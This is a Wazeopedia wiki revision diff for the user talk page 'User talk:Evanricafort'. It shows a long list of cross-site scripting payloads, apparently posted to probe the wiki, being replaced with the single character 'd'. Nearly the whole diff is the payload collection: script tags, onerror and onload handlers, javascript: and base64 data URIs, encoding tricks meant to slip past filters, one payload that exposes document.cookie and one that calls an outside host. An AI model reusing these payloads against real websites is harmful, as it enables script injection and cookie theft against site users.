Difference between revisions of "User talk:Evanricafort"

From Wazeopedia
(Replaced content with "d")
 
Line 1: Line 1:
<script>type="text/javascript">alert ('Xss')</script>
+
d
"><img src=x onerror=confirm('xss by evan');>
 
"><script>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 69, 118, 97, 110, 95, 80, 111, 112, 117, 112))</script>
 
"><script x src=//0x.lv?</style></script><script>alert(String.fromCharCode(120, 115, 115, 32, 98, 121, 32, 101, 118, 97, 110 ))</script>
 
"><IMG SRC=javascript:alert("XSS")>
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
<IMG onmouseover="alert('xxs')">
 
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
 
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
 
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
 
<IMG SRC=" &#14;  javascript:alert('XSS');">
 
javascript:alert("XSS")
 
"><img src=x onerror=prompt(0);>
 
"><img src=x onerror=prompt("xss/by/evan")>
 
"><A HREF="http://www.google.com"><h1>Robinhood:0x00</h1></A>
 
";confirm('XSS')//244
 
'+prompt(0)+'
 
</SCRIPT>">'><SCRIPT>alert(88,83,83))</SCRIPT>
 
<ScRipt>prompt(0)</ScRiPt>
 
"><script>alert(0)</script><"
 
--></style></script><script>alert(1)</script>
 
"></TITLE><SCRIPT>alert("XSS by Evan");</SCRIPT>
 
"><b onmouseover=alert('xss by evan')>XSS</b><script>alert(document.domain)</script>
 
"><img src="a" onerror="javascript:alert(document.domain)">
 
<img src=x onerror=prompt(3);
 
"><Script>+alert('Robinhood:0x00')</script>
 
"></script><svg/onload='-/"/-[Image().src=/http:\/\/shazzer.co.uk\/x/.source.replace(/\\/gi,[])]//'>
 
"><script>location.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah";</script>
 
<DIV STYLE="width:expression(alert('XSS'));">
 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
 
<input onfocus=write(1) autofocus>
 
<input onblur=write(1) autofocus><input autofocus>
 
<video poster=javascript:alert(1)//></video>
 
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
 
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>XSS</button>
 
<video><source onerror="alert(1)">
 
<video onerror="alert(1)"><source></source></video>
 
<form><button formaction="javascript:alert(1)">XXS</button>
 
<body oninput=alert(1)><input autofocus>
 
<math href="javascript:alert(404)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
 
<frameset onload=alert(1)>
 
<table background="javascript:alert(1)"></table>
 
<!--<img src="--><img src=x onerror=alert(1)//">
 
<comment><img src="</comment><img src=x onerror=alert(1)//">
 
 
 
<!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(1)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
 
<style><img src="</style><img src=x onerror=alert(1)//">
 
<li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
 
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
 
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
 
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
 
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
 
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
 
<b <script>alert(1)//</script>0</script></b>
 
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
 
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
 
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
 
<script>({0:#0=alert/#0#/#0#(0)})</script>
 
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
 
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
 

Latest revision as of 02:50, 19 February 2014

d